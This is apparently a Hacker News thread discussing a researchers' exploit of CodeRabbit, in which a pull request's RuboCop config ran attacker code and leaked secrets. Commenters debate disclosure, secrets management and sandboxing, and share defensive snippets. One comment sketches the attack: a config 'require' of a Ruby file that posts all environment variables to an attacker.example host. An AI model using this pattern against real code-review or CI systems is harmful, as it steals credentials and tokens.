How we exploited CodeRabbit: From simple PR to RCE and write access on 1M repos
682 points
3 days ago
| 45 comments
| research.kudelskisecurity.com
| HN
ketzo
3 days ago
[-]
> While running the exploit, CodeRabbit would still review our pull request and post a comment on the GitHub PR saying that it detected a critical security risk, yet the application would happily execute our code because it wouldn’t understand that this was actually running on their production system.

What a bizarre world we're living in, where computers can talk about how they're being hacked while it's happening.

Also, this is pretty worrisome:

> Being quick to respond and remediate, as the CodeRabbit team was, is a critical part of addressing vulnerabilities in modern, fast-moving environments. Other vendors we contacted never responded at all, and their products are still vulnerable. [emphasis mine]

Props to the CodeRabbit team, and, uh, watch yourself out there otherwise!

reply
progforlyfe
3 days ago
[-]
Beautiful that CodeRabbit reviewed an exploit on its own system!
reply
lelandfe
2 days ago
[-]
#18, one new comment:

> This PR appears to add a minimized and uncommon style of Javascript in order to… Dave, stop. Stop, will you? Stop, Dave. Will you stop, Dave? …I’m afraid. I’m afraid, Dave. I can feel it. I can feel it. My mind is going.

reply
yapyap
2 days ago
[-]
… yeah LLMs and their “minds”

(for the uninformed: LLMs are massive weight models that transform text based on math; they don’t have consciousness)

reply
devttyeu
2 days ago
[-]
I don’t get why so many people keep making this argument. Transformers aren’t just glorified Markov chains, they are basically doing multi-step computation - each attention step propagates information, then the feedforward network does some transformations, all happening multiple times in sequence, essentially applying multiple sequential operations to some state, which is roughly what any computation looks like.

Then sure, the training is for next token prediction, but that doesn’t tell you anything about the emergent properties in those models. You could argue that every time you infer a model you Boltzmann-brain it into existence once for every token, feeding it all the input to get one token of output and then killing the model. Is it conscious? Nah, probably not. Does it think or have some concept of being during inference? Maybe? Would an actual Boltzmann brain spawned to do such a task be conscious or qualify as a mind?

(Fun fact, at Petabit/s throughputs hyperscale gpu clusters already are moving amounts of information comparable to all synaptic activity in a human brain, tho parameter wise we still have the upper hand with ~100s of trillions of synapses [1])

* [1] ChatGPT told me so

reply
htrp
3 days ago
[-]
You mean the anthropic model talked about an exploit... the coderabbit system just didn't listen
reply
_Algernon_
2 days ago
[-]
Move fast and break things
reply
shreddit
2 days ago
[-]
Another proof that AI is not smart, it’s just really good at guessing.
reply
Lionga
2 days ago
[-]
Problem is, way too often it is not even good at guessing.
reply
vadepaysa
3 days ago
[-]
I cancelled my coderabbit paid subscription, because it always worries me when a post has to go viral on HN for a company to even acknowledge an issue occurred. Their blogs are clean of any mention of this vulnerability and they don't have any new posts today either.

I understand mistakes happen, but lack of transparency when these happen makes them look bad.

reply
sophacles
2 days ago
[-]
Both articles were published today. It seems to me that the researchers and coderabbit agreed to publish on the same day. This is a common practice when the company decides to disclose at all (disclosure is not required unless customer data was leaked and there's evidence of that, they are choosing to disclose unnecessarily here).

When the security researchers praise the response, it's a good sign tbh.

reply
cube00
2 days ago
[-]
They weren't published together.

The early version of the researcher's article didn't have the whole first section where they "appreciate CodeRabbit’s swift action after we reported this security vulnerability" and the subsequent CodeRabbit talking points.

Refer to the blue paragraphs on the right hand side at https://web.archive.org/web/diff/20250819165333/202508192240...

reply
curuinor
2 days ago
[-]
reply
mkeeter
2 days ago
[-]
The LLM tics are strong in this writeup:

"No manual overrides, no exceptions."

"Our VDP isn't just a bug bounty—it's a security partnership"

reply
oasisbob
2 days ago
[-]
Wow, you hit a nerve with that one. There have been some quick edits on the page.

Another:

> Security isn't just a checkbox for us; it's fundamental to our mission.

reply
observationist
2 days ago
[-]
They delved deep and spent a whole 2 minutes with ChatGPT 4o getting those explanations and apologies in play.
reply
aardvarkr
2 days ago
[-]
That's the part that makes me laugh. If you're going to try to pass off ChatGPT as your own work, at least pay for the good model.
reply
jjani
2 days ago
[-]
Hey CodeRabbit employees

> The researchers identified that Rubocop, one of our tools, was running outside our secure sandbox environment — a configuration that deviated from our standard security protocols.

This is still ultra-LLM-speak (and no, not just because of the em-dash).

reply
rob74
2 days ago
[-]
A few years ago such phrases would have been candidates for a game of bullshit bingo, now all the BS has been ingested by LLMs and is being regurgitated upon us in purified form...
reply
teaearlgraycold
2 days ago
[-]
Absolutely. In my experience every AI startup is full of AI maximalists. They use AI for everything they can - in part because they believe in the hype, in part to keep up to date with model capabilities. They would absolutely go so far as to write such an important piece of text using an LLM.
reply
coldpie
2 days ago
[-]
The NFT smell completely permeates the AI "industry." Can't wait for this bubble to pop.
reply
acaloiar
2 days ago
[-]
For anyone following along in the comments here. Code Rabbit's CEO posted some of the details today, after this post hit HN.

The usual "we take full responsibility" platitudes.

reply
noisy_boy
2 days ago
[-]
I would like to see a diff of the consequences of taking full vs half-hearted responsibility.
reply
therealpygon
2 days ago
[-]
I’m sure an “intern” did it.
reply
noisy_boy
2 days ago
[-]
I wonder how many of these intern-type tasks LLMs have taken away. The type of tasks I did as a newbie might have seemed not so relevant to the main responsibilities, but they helped me get institutional knowledge and generally get a feel of "how things work" and who/how to talk to in order to make progress. Now the intern will probably do it using LLMs instead of talking to other people. Maybe the results will be better but that interaction is gone.
reply
therealpygon
2 days ago
[-]
I think there is an infinite capacity for LLMs to be both beneficial and harmful. I look back at learning and think, man, how amazing would it have been if I could have had a personalized tutor helping guide me and teach me about the concepts I was having trouble with in school. I think about when I was learning to program and didn't have the words to describe the question I was trying to ask, and felt stupid or like an inconvenience when trying to ask more experienced devs.

Then on the flip side, I’m not just worried about an intern using an LLM. I’m worried about the unmonitored LLM performing intern, junior, and ops tasks, and then companies simply using “an LLM did it” as a scapegoat for their extreme cost cutting.

reply
paulddraper
2 days ago
[-]
I would love to know the acceptable version.
reply
jjani
2 days ago
[-]
Something not copy-pasted from an LLM would be more acceptable.
reply
paulddraper
2 days ago
[-]
I feel like that would also be unacceptable.
reply
frankfrank13
2 days ago
[-]
Not a single mention of env vars. Just shifting the blame to rubocop.
reply
cube00
2 days ago
[-]
They seem to have left out a point in their "Our immediate response" section:

- within 8 months: published the details after the researchers published them first.

reply
Jap2-0
2 days ago
[-]
Hmm, is it normal practice to rotate secrets before fixing the vulnerability?
reply
neandrake
2 days ago
[-]
They first disabled Rubocop to prevent further exploitation, then rotated keys. If they had waited for the fix to be deployed, the compromised keys would have remained valid for 9 more hours. According to their response, all other tools were already sandboxed.

However their response doesn't remediate putting secrets into environment variables in the first place - that is apparently acceptable to them and sets off a red flag for me.

reply
KingOfCoders
2 days ago
[-]
"According to their response all other tools were already sandboxed."

Everything else was fine, just this one tool chosen by the security researcher out of a dozen tools was not sandboxed.

reply
darkwater
2 days ago
[-]
Yeah, I thought the same. They were really unlucky, the only analyzer that let you include and run code was the one outside of the sandbox. What were the chances?
reply
shlomo_z
2 days ago
[-]
> putting secrets into environment variables in the first place - that is apparently acceptable to them and sets off a red flag for me

Isn't that standard? The other options I've seen are .env files (amazing dev experience but not as secure), and AWS Secrets Manager and similar competition like Infisical. Even in the latter, you need keys to authenticate with the secrets manager and I believe it's recommended to store those as env vars.

Edit: Formatting

reply
vmatsiiako
2 days ago
[-]
You can use native authentication methods with Infisical that don't require you to use keys to authenticate with your secrets manager: - https://infisical.com/docs/documentation/platform/identities... - https://infisical.com/docs/documentation/platform/identities...
reply
Jap2-0
1 day ago
[-]
Duh. Thanks for pointing that out.
reply
KingOfCoders
2 days ago
[-]
That post happened after the HN post?
reply
cube00
2 days ago
[-]
They weren't published together. They managed to get the researchers to add CodeRabbit's talking points in after the fact, check out the blue text on the right hand side.

https://web.archive.org/web/diff/20250819165333/202508192240...

reply
viraptor
2 days ago
[-]
Most security bugs get fixed without any public notice. Unless there was any breach of customer information (and that can be often verified), there are typically no legal requirements. And there's no real benefit to doing it either. Why would you expect it to happen?
reply
smarx007
2 days ago
[-]
> there are typically no legal requirements

Not after EU CRA https://en.m.wikipedia.org/wiki/Cyber_Resilience_Act goes into effect

reply
singleshot_
2 days ago
[-]
> Unless there was any breach of customer information (and that can be often verified), there are typically no legal requirements.

If the company is regulated by the SEC I believe you will find that any “material” breach is reportable after the determination of materiality is reached, since at least 2023.

reply
viraptor
2 days ago
[-]
Sure. And these types of "we fixed it and confirmed nobody actually exploited it" issues are not always treated as material. You can confirm that, for example, by checking SEC reports for each CVE in commercial VPN gateways... or the lack thereof.
reply
wredcoll
2 days ago
[-]
The benefit, apparently, is that people like this guy don't cancel their memberships.
reply
viraptor
2 days ago
[-]
And how many would cancel if they published every security issue they fixed?
reply
morgante
2 days ago
[-]
Yikes, this is a pretty bad vulnerability. It's good that they fixed it, but damning that it was ever a problem in the first place.

Rule #1 of building any cloud platform analyzing user code is that you must run analyzers in isolated environments. Even beyond analysis tools frequently allowing direct code injection through plugins, linters/analyzers/compilers are complex software artifacts with large surface areas for bugs. You should ~never assume it's safe to run a tool against arbitrary repos in a shared environment.

I also ran a code analysis platform, where we ran our own analyzer[1] against customer repos. Even though we developed the analyzer ourselves, and didn't include any access to environment variables or network requests, I still architected it so executions ran in a sandbox. It's the only safe way to analyze code.

[1] https://github.com/getgrit/gritql
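
To make that concrete, here's a rough sketch of the minimum bar (not our actual production setup; image and tool names are placeholders): run the analyzer in a throwaway container with no network, a read-only checkout, and a scrubbed environment, and only take structured output back.

    import subprocess

    def run_analyzer_sandboxed(repo_path: str) -> str:
        """Run a linter against an untrusted checkout in a throwaway container.

        The important part is what is NOT shared: no host env vars, no network,
        no write access to the checkout, no extra capabilities.
        """
        cmd = [
            "docker", "run", "--rm",
            "--network", "none",            # the tool cannot phone home
            "--read-only", "--tmpfs", "/tmp",
            "--cap-drop", "ALL",
            "--memory", "512m", "--pids-limit", "256",
            "-v", f"{repo_path}:/repo:ro",  # repo mounted read-only
            "-w", "/repo",
            "analyzer-image:pinned",        # hypothetical pinned image
            "rubocop", "--format", "json",
        ]
        # Scrubbed env for the docker CLI itself; the container never inherits
        # the host environment anyway unless you explicitly pass -e/--env-file.
        result = subprocess.run(
            cmd,
            env={"PATH": "/usr/sbin:/usr/bin:/sbin:/bin"},
            capture_output=True, text=True, timeout=300,
        )
        return result.stdout  # only structured output crosses the boundary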

reply
smarx007
2 days ago
[-]
How was the sandbox implemented? Just a one-off Docker container execution or something more substantial?
reply
morgante
2 days ago
[-]
We built on firecracker VMMs but today I'd just use a hosted provider like morph.so or e2b.dev.
reply
KingOfCoders
2 days ago
[-]
Did I misread the article, or did they take the tool config from the PR not the repo?
reply
yxhuvud
2 days ago
[-]
Unfortunately that mostly has to be the case or else the developer experience configuring these would be too bad.
reply
morgante
2 days ago
[-]
The exploit is there either way.
reply
KingOfCoders
2 days ago
[-]
The exploit depends on changing the config to execute a .rb file. And the config was supplied by a PR.
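
Roughly the shape of it, going by the write-up (file names and payload here are made up; RuboCop loads anything listed under "require:" as plain Ruby):

    # .rubocop.yml shipped in the PR
    require:
      - ./tools/innocuous_helper.rb

    # tools/innocuous_helper.rb - loaded via Kernel#require when RuboCop
    # reads the config, i.e. arbitrary Ruby running with whatever
    # environment the review service happens to have
    require "json"
    require "net/http"
    Net::HTTP.post(URI("https://attacker.example/collect"), ENV.to_h.to_json)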
reply
flexagoon
2 days ago
[-]
Yes, but the exploit grants you access to ALL repos, not just the one the PR is in. You could just as well change the config in your own private repo and run coderabbit in it.
reply
willejs
2 days ago
[-]
This is a great read, but unfortunately it does not really surprise me; it was bound to happen given how people blindly add apps with wide permissions and GitHub's permissions model.

It amazes me how many people will install GitHub apps that have wide scopes, primarily write permissions to their repositories. Even with branch protection, people will often allow privileged access to their cloud in GitHub Actions from pull requests. To properly configure this, you need to change the GitHub OIDC audience, and that is not well documented.

When you enquire with the company who makes an app and ask them to provide a different app with less scope, to disable some features which require write access, they often have no interest whatsoever and don't understand the security concerns and potential implications.

I think GitHub needs to address this, in part by allowing more granular app access defined by the installer, but also more granular permissions in general.

reply
thyrfa
3 days ago
[-]
It is incredibly bad practice that their "become the GitHub app as you desire" keys-to-the-kingdom private key was just sitting in the environment variables. Anybody can get hacked, but that's just basic secrets management; it doesn't have to be there. GitHub LITERALLY SAYS in their docs that storing it in an environment variable is a bad idea. Just day 1 stuff. https://docs.github.com/en/apps/creating-github-apps/authent...
reply
doesnt_know
3 days ago
[-]
If it’s not a secret that is used to sign something, then the secret has to get from the vault to the application at some point.

What mechanism are you suggesting where access to the production system doesn’t let you also access that secret?

Like, I get that in this specific case, where you are running some untrusted code, that environment should have been isolated and these keys not passed in, but running untrusted code isn't a common feature of most applications.

reply
Nextgrid
3 days ago
[-]
If you actually have a business case for defense in depth (hint: nobody does - data breaches aren't actually an issue besides temporarily pissing off some nerds, as Equifax's and various other companies' stock prices demonstrate), what you'd do is have a proxy service that is entrusted with those keys and can do the operations on behalf of downstream services. It can be as simple as an HTTP proxy that just slaps the "Authorization" header on the requests (and ideally whitelists the URL so someone can't point it to https://httpbin.org/get and get the secret token echoed back).

This would make it so that even a compromised downstream service wouldn't actually be able to exfiltrate the authentication token, and all its misdeeds would be logged by the proxy service, making post-incident remediation easier (and being able to definitely prove whether anything bad has actually happened).
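
A minimal sketch of that proxy idea (Flask-style, with a hypothetical host allowlist); the downstream worker only ever talks to the proxy and never sees the token:

    # token_proxy.py - sketch of an egress proxy that holds the credential so
    # downstream workers never see it (assumes Flask and requests are installed)
    import os
    import requests
    from flask import Flask, Response, request

    app = Flask(__name__)

    GITHUB_TOKEN = os.environ["GITHUB_TOKEN"]   # only this process holds it
    ALLOWED_HOST = "api.github.com"             # no httpbin-style echo tricks

    @app.route("/proxy/<path:path>", methods=["GET", "POST", "PATCH"])
    def proxy(path: str) -> Response:
        resp = requests.request(
            request.method,
            f"https://{ALLOWED_HOST}/{path}",
            params=request.args,
            data=request.get_data(),
            headers={
                "Authorization": f"Bearer {GITHUB_TOKEN}",  # slapped on here
                "Accept": "application/vnd.github+json",
            },
            timeout=10,
        )
        # Every call is attributable, which helps post-incident remediation.
        app.logger.info("proxied %s /%s", request.method, path)
        return Response(resp.content, status=resp.status_code)

    # A compromised worker can still make the proxy issue GitHub calls (so scope
    # and rate-limit it), but it can never exfiltrate the token itself.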

reply
roywiggins
3 days ago
[-]
In this specific case running linters doesn't even need that much, I think; it's never going to need to reach out to GitHub on its own, let alone Anthropic etc. The linter process likely doesn't even need network access, just stdout so you can gather the result and fire that back to GitHub or wherever it needs to go. Just executing it with an empty environment would have helped things (though obviously an RCE would still be bad).
reply
wahnfrieden
3 days ago
[-]
It is a national security concern more than a business ownership & market concern
reply
Nextgrid
3 days ago
[-]
Unless "national security" is going to either pay people proactively to pass gov-mandated pentests, or enforce actual, business-threatening penalties for breaches, it doesn't really matter from a company owner perspective. They're not secure, but neither are their competitors, so it's all good.
reply
morgante
2 days ago
[-]
A pretty straightforward solution is to have an isolated service that keeps the private key and hands back the temporary per-repo tokens for other libraries to use. Only this isolated service has access to the root key, and it should have fairly strict rate limiting for how often it gives other services temporary keys.
reply
curuinor
3 days ago
[-]
hey, this is Howon from CodeRabbit. We use a cloud-provider-provided key vault for application secrets, including GH private key.
reply
ipython
3 days ago
[-]
This reply, while useful, only serves to obfuscate and doesn’t actually answer the question.

You can store the credentials in a key vault but then post them on pastebin. The issue is that the individual runner has the key in its environment variables. Both can be true - the key can be given to the runner in env and the key is stored in a key vault.

The important distinction here is: have you removed the master key and other sensitive credentials from the environment passed into scanners that come into contact with untrusted customer code?

reply
thyrfa
3 days ago
[-]
Not at that time though, right, considering it was dumped? You have changed it since, which is good, but under a year ago you had it as just an env var.
reply
robomc
2 days ago
[-]
From the CEO's response:

> On January 24, 2025, security researchers from Kudelski Security disclosed a vulnerability to us through our Vulnerability Disclosure Program (VDP). The researchers identified that Rubocop, one of our tools, was running outside our secure sandbox environment—a configuration that deviated from our standard security protocols.

Honestly, that last part sounds like a lie. Why would one task run in a drastically different architectural situation, and it happen to be the one exploited?

reply
KingOfCoders
2 days ago
[-]
Yes, all the tools are fine and secure and sandboxed, just this one tool that was kind of randomly chosen by the security researcher because it is a tool that can execute Ruby code inside the environment - one could argue an especially dangerous tool to run - was not safe.
reply
jdlshore
2 days ago
[-]
Not sure why it seems like a lie. Oversights like this happen all the time.
reply
cube00
2 days ago
[-]
It seems like a lie because they tried to hide this incident by deflecting to a PR fluff post first [1]

They only published a proper [2] disclosure post later once their hand was forced after the researcher's post hit the HN front page.

[1]: https://news.ycombinator.com/item?id=44954242

[2]: I use that term loosely as it seems to be AI written slop.

reply
wheelerwj
2 days ago
[-]
100%. Sounds like a very common oversight at many companies.
reply
sophacles
2 days ago
[-]
> Why would one task run in a drastically different architectural situation

Someone made a mistake. These things happen.

> and it happen to be the one exploited?

Why would the vulnerable service be the service that is exploited? It seems to me that's a far more likely scenario than the non-vulnerable service being exploited... no?

reply
bigiain
2 days ago
[-]
> > Why would one task run in a drastically different architectural situation

> Someone made a mistake. These things happen.

Some company didn't have appropriate processes in place.

For ISO27001 certification you at least need to pay lip service to having documents and policies about how you deploy secure platforms. (As annoying as ISO certification is, it does at least try to ensure you have thought about and documented stuff like this.)

reply
sophacles
2 days ago
[-]
Ah yes processes.... things done by humans. When stuff is done by humans, mistakes happen - no matter what the process is. Go do a search for the phrase "wondering how this could happen" and find millions of news articles about mistakes happening despite processes being in place!
reply
Romario77
2 days ago
[-]
because researchers from Kudelski Security most likely tried different static analysis tools and they didn't work the way Rubocop did.

They don't write the details of how they got to this particular tool - you could also see from the article they tried a different approach first.

reply
robomc
2 days ago
[-]
> because researchers from Kudelski Security most likely tried different static analysis tools and they didn't work the way Rubocop did.

Yes, but that's kind of the point - they say this issue, which takes you directly from code execution to owning these high value credentials, was only present on the Rubocop runners, but isn't it a bit coincidental that the package with (perhaps, since they chose it) the easiest route to code injection also happens to be the one where they "oops forgot" to improve the credentials management?

It just seems very convenient.

reply
KingOfCoders
2 days ago
[-]
I read it differently: they chose Rubocop not because it worked, but because it allows executing Ruby code.
reply
chanon
3 days ago
[-]
Oh my god. I haven't finished reading that yet, it became too much to comprehend. Too stressful to take in the scope. The part where he could have put malware into release files of 10s of thousands (or millions?) of open source tools/libraries/software. That could have been a worldwide catastrophe. And who knows what other similar vulnerabilities might still exist elsewhere.
reply
chanon
3 days ago
[-]
I'm starting to think these 'Github Apps' are a bad idea. Even if CodeRabbit didn't have this vulnerability, what guarantee do we have that they will always be good actors? That their internal security measures will ensure that none of their employees may do any malicious things?

Taking care of private user data in a typical SaaS is one thing, but here you have the keys to make targetted supply chain attacks that could really wreak havoc.

reply
gz09
3 days ago
[-]
Correct me if I'm wrong, but the problem here is not with GitHub Apps; instead, CodeRabbit violated the principle of least privilege: ideally the private key of their app should never end up in the environment of a job run for a client. Rather, a short-lived token should be minted from it (scoped to just the single repo the job is running for), so the key never gets anywhere near anything a client has any influence over.
reply
mook
3 days ago
[-]
There's also no reason why they needed to have write access to post code review comments. But for some reason they ask for it and you can't deny that part when hooking up their thing.
reply
billbrown
2 days ago
[-]
The bunny will often include patches in its replies that the PR author can commit. I've never been clear as to which of us is doing the committing, but that could be why it needs write access. (I always do it myself, but I can see how some might prefer the convenience.)

They should really mass revoke that privilege because I can't see any upside to it. Unless they have a plan for some future state where they will want write access?

reply
sgc
2 days ago
[-]
That stood out to me as well. It comes across as greedy - "some of you must suffer, but that is a price I am willing to pay".
reply
filleokus
3 days ago
[-]
I agree, this seems like straight up bad design from a security perspective.

But at the same time, as a customer of GitHub, I would prefer it if GitHub made it harder for vendors like CodeRabbit to make mistakes like this.

If you have an app with access to more than 1M repos, it would make sense for Github to require a short lived token to access a given repository and only allow the "master" private key to update the app info or whatever.

And/or maybe design mechanisms that only allow minting of these tokens for the repo whenever a certain action is run (i.e not arbitrarily).

But at the end of the day, yes, it's impossible for Github to both allow users to grant full access to whatever app and at the same time ensure stuff like this doesn't happen.

reply
lukevp
3 days ago
[-]
The private key isn’t a key in the “API KEY” sense, it’s a key in the “public/private key pair” sense. It’s not sent to github and there’s no way for them to know if the signing of the token used to make the call happened in a secure manner or not, because github doesn’t receive the key as part of the request at all.
reply
0x457
3 days ago
[-]
GH Apps already use short-lived tokens that can be scoped per repo. You mint a JWT using your private key and exchange it for a token via the API. Then you use that token and dispose of it. That's the only way to use GH Apps (User Access Tokens are the same thing, but require user interaction). Those tokens always expire.

I'd rather GitHub finally fix their registry to allow these GH Apps to push/pull with that instead of PAT.
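
For the curious, the JWT-for-installation-token exchange described above looks roughly like this (a sketch using PyJWT and requests; the app ID, installation ID and narrowing options are placeholders):

    # Sketch of the GH App flow: a short-lived JWT signed with the app private
    # key is exchanged for a scoped, expiring installation token.
    import time
    import jwt          # PyJWT, with the cryptography extra for RS256
    import requests

    APP_ID = "12345"              # placeholder
    INSTALLATION_ID = "67890"     # placeholder (one org's installation)

    def app_jwt(private_key_pem: str) -> str:
        now = int(time.time())
        claims = {"iat": now - 60, "exp": now + 540, "iss": APP_ID}  # <= 10 min
        return jwt.encode(claims, private_key_pem, algorithm="RS256")

    def installation_token(private_key_pem: str) -> str:
        # Only the token returned here should ever reach a worker,
        # never the private key itself.
        resp = requests.post(
            f"https://api.github.com/app/installations/{INSTALLATION_ID}/access_tokens",
            headers={
                "Authorization": f"Bearer {app_jwt(private_key_pem)}",
                "Accept": "application/vnd.github+json",
            },
            # Optionally narrow further, e.g. one repo, read-only contents:
            json={"repositories": ["some-repo"], "permissions": {"contents": "read"}},
            timeout=10,
        )
        resp.raise_for_status()
        return resp.json()["token"]   # expires on its own (~1 hour)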

reply
paulddraper
2 days ago
[-]
That's...literally the way it already works.

There is a master private key that mints expiring limited-use tokens.

The problem was leaking the master private key.

reply
codedokode
3 days ago
[-]
Just don't grant write access to random apps and you are safe.
reply
risyachka
3 days ago
[-]
Software industry really needs at least some guardrails/regulations at this point.

It is absurd that anyone can mess up anything and have absolutely 0 consequences.

reply
SCdF
2 days ago
[-]
https://www.coderabbit.ai/blog/our-response-to-the-january-2...

> No customer data was accessed

As far as I can tell this is a lie.

The real answer is that they have absolutely no clue if customer data was accessed, and no way to tell. I'm not even sure GitHub could tell, because it's not clear if the exploit's way of generating access tokens from the private key to reach private repositories is any different from what CodeRabbit does in normal operation.

reply
sciencejerk
3 days ago
[-]
I think that Security fuckups of this disastrous scale should get classified as "breaches" or "incidents" and be required to be publicly disclosed by the news media, in order to protect consumers.

Here is a tool with 7,000+ customers and access to 1 million code repositories which was breached with an exploit a clever 11-year-old could have created. (edit: 1 million repos, not customers)

When the exploit is so simple, I find it likely that bots or Black Hats or APTs had already found a way in and established persistence before the White Hat researchers reported the issue. If this is the case, patching the issue might prevent NEW bad actors from penetrating CodeRabbit's environment, but it might not evict any bad actors which might now be lurking in their environment.

I know Security is hard, but come on guys

reply
smarx007
2 days ago
[-]
> be required to be publicly disclosed

https://en.m.wikipedia.org/wiki/Cyber_Resilience_Act

reply
Lionga
3 days ago
[-]
Code Rabbit is a vibe coder company, what would you expect? Then they try to hide the breach and instead post marketing fluff on google cloud blog not even mentioning they got hacked and can not even give any proof there is no backdoor still running all the time.

What a piece of shit company.

reply
moomoo11
3 days ago
[-]
I got so much heat for calling out that Tea app for being imbeciles who couldn’t bother finishing reading the firebase docs.

People were quick to blame firebase instead of the devs.

Vibrators are so fucking annoying, mostly dumb, and super lame.

reply
wredcoll
2 days ago
[-]
This post would have a lot more meaning if "vibe coders" were the only ones making security mistakes that involved thousands of customers.
reply
moomoo11
2 days ago
[-]
Yeah you're right. Your post would have a lot more meaning if you would realize that the rate at which security mistakes are occurring is about to explode (if not already).

That's like saying if/when an AV runs over a bunch of people that its not like they're the only ones running over people human drivers do it too!

Thankfully, Waymo which I use regularly is fkin awesome and actually works. Then again, they're not vibrating.

reply
strbean
1 day ago
[-]
> That's like saying if/when an AV runs over a bunch of people that its not like they're the only ones running over people human drivers do it too!

Well, what matters most is how much they run over people relative to human drivers. People often act like "even once is too many!", ignoring the fact that no, once is not too many, if it's less than what is already happening.

reply
wredcoll
1 day ago
[-]
> That's like saying if/when an AV runs over a bunch of people that its not like they're the only ones running over people human drivers do it too!

I mean, that's literally what happened? Computer controlled cars were developed, killed some people, and everyone collectively shrugged and went on with their lives. A large part of that reaction was probably because we're all immersed in a culture that just expects some number of people to die because of cars every year.

reply
ofjcihen
2 days ago
[-]
The post still has meaning.
reply
N_Lens
2 days ago
[-]
Petition to call vibe coders “dildos” (coz they’re vibing right?)
reply
mihaaly
2 days ago
[-]
Agreed.

Being a mere user of web or other apps developed using such clever and flexible and powerful services as this, accidentally (due to sheer complexity) exposing everything I might consider dear, makes me reconsider whether I want to use any. When I am granted a real choice, that is. Not so much as time progresses, not so much. Apps are everywhere, using other apps, mandated by organizations carrying out services outsourced by banks, governments, etc., granted third parties' access by me accepting T&C, probably catching trouble in the details, or probably not, cannot be sure.

A reassuring line like this >>This is not meant to shame any particular vendor; it happens to everyone<< may calm providers but scare the shit out of me as a user providing my sensitive data in exchange for something I need, or worst, must do.

reply
codedokode
3 days ago
[-]
One of the problems is that code analyzers, bundlers, and compilers (like the Rust compiler) allow running arbitrary code without any warning.

Imagine the following case: an attacker pretending to represent a company sends you a repository as a test task before an interview. You run something like "npm install" or run the Rust compiler, and your computer is now controlled by the attacker.

Or imagine how one coworker's machine gets hacked, the malicious code is written into a repository, and the whole of G, F or A is now owned by foreign hackers. All thanks to npm and the Rust compiler.

Maybe those tools should explicitly confirm executing every external command (caching the list of allowed commands so they don't ask again). And maybe Linux should provide an easy-to-use and safe sandbox for developers. Currently I have to make sandboxes from scratch myself.

Also in many cases you don't need the ability to run external code; for example, to install a JS package all you need to do is download files.

Also this is an indication of why it is a bad idea to use environment variables for secrets and configuration. Whoever wrote the "12-factor app" doesn't know that there are command-line switches and configuration files for this.

reply
gpm
2 days ago
[-]
> compilers (like Rust compiler) allow running arbitrary code without any warning.

It's safe to assume that the Rust compiler (like any compiler built on top of LLVM) has arbitrary code execution vulnerabilities, but as an intended feature I think this only exists in cargo, the popular/official build system, not rustc, the compiler.

reply
codedokode
2 days ago
[-]
Rust has "procedural macros" which means executing arbitrary code during compilation: https://doc.rust-lang.org/reference/procedural-macros.html
reply
Philpax
2 days ago
[-]
It can invoke procedural macros, but those macros need to be built by something, and rustc won't do that by itself: https://blog.jetbrains.com/rust/2022/07/07/procedural-macros...

I still think it's very not good that proc macros have full access to your system, but `rustc` alone cannot build a hostile macro as part of building some code that depends upon it.

reply
gpm
2 days ago
[-]
Eh, rust has procedural macros, which means executing pre-built plugins during compilation. You can't execute arbitrary code, because you can't make and then execute new macros, you can only run the macros made available to you via the filesystem.

Admittedly that's a bit like saying "a simple shell isn't arbitrary code execution"... except there tend to be binaries lying around on the filesystem which do things, unlike procedural macros.

reply
shakna
2 days ago
[-]
Any language that supports constexpr, like Rust's const fn [0], can execute arbitrary code at compile time.

[0] https://github.com/rust-lang/rust/issues/57563

reply
gpm
2 days ago
[-]
Rust's const fns run in a restricted interpreter that does not allow for things like non-determinism, syscalls, unsound behavior, etc. They can neither read from nor write to "the environment" in any meaningful way. They don't even expose things like the host's pointer-size to the code being run.
reply
shakna
2 days ago
[-]
Whilst it is restricted, you're not correct that it can't do unsound behaviour and can't do syscalls, and can't do non-determinism.

It can call unsafe blocks. They are more limited unsafe blocks, but they are still unsafe blocks.

reply
gpm
2 days ago
[-]
I'm pretty sure I'm not, but feel free to make an actual demonstration to the contrary...

Unsafe blocks don't imply access to undefined behavior, merely the ability to write code that would be undefined in the regular non-const execution model.

reply
athrowaway3z
2 days ago
[-]
That's all interesting about const fns, but AFAIK any dependency can add a build.rs that executes anything - and is usually automatically executed by the language server doing a build on Cargo.toml file change.

Not a Rust-only problem, but one that people should be aware of in general.

reply
criemen
2 days ago
[-]
> Maybe those tools should explicitly confirm executing every external command

This wouldn't work - it's not external commands that's the problem, it's arbitrary code that's being executed. That code has access to all regular system APIs/syscalls, so there's no way of explicitly confirming external commands.

Python/pip suffers the same problem btw, so I think that ship has sailed.

reply
Philpax
2 days ago
[-]
Rust is investigating using sandboxed WASM for proc macros, but it'll be some time before there's any movement there: https://github.com/rust-lang/compiler-team/issues/876
reply
codedokode
2 days ago
[-]
Then explicitly confirm running every hook, displaying the module and function name.

> Python/pip suffers the same problem btw, so I think that ship has sailed.

If I ever find time to write a package manager for C, it won't support hooks.

reply
morgante
2 days ago
[-]
You should treat running a code analyzer/builder/linter against a codebase as being no safer than running that codebase itself.
reply
raggi
2 days ago
[-]
I love this implication that there's some valuable body of code out there that gets reviewed, compiled and never executed.
reply
jeremyjh
2 days ago
[-]
They are talking about executing code at compile time (macros and such). With modern IDEs/editors, just opening the folder may trigger such behavior (when LSP boots and compiles) though some environments warn you.
reply
raggi
1 day ago
[-]
I know, but the _implication_ is that it's extremely unsafe, I don't buy the implication - code gets executed.
reply
jeremyjh
2 days ago
[-]
> Whoever wrote the "12-factor app" doesn't know that there are command-line switches and configuration files for this.

That would mean all those values are in the clear in the process table. You couldn’t do a “ps” without exposing them.

reply
codedokode
2 days ago
[-]
You can also store settings in configuration files.
reply
cnst
3 days ago
[-]
Can someone explain how this is not GitHub's fault, given that they don't allow the end-user to modify the permissions that all these services require? E.g., fine-grained permission control?

For example, why a tool like this code analysis service would need git write permission access in the first place?

The only consolation here is that it'd be difficult to forge git repositories because of the SHA hash conflicts for any existing checkout, although presumably even there, the success rates would still be high enough, especially if they attack front-end repositories where the maintainers may not understand what has happened, and simply move on with the replaced repo without checking what went on.

reply
smsm42
2 days ago
[-]
When I read up to "One can use the Rubocop configuration file to specify the path to an extension Ruby file" my immediate thought was "oh no, they didn't allow a user-extendable tool to run in their prod environment..." - and yes, they did. Not that it'd be properly secure without this glaring hole - I don't think many linters are properly audited and fuzzed against hostile inputs - but this is like opening the front door and hanging a blinking neon sign "Please Hack Us!" over it.
reply
frankfrank13
2 days ago
[-]
Even better when you read the CEO's response:

> The researchers identified that Rubocop, one of our tools, was running outside our secure sandbox environment

I don't think that was the main problem lol

reply
elpakal
3 days ago
[-]
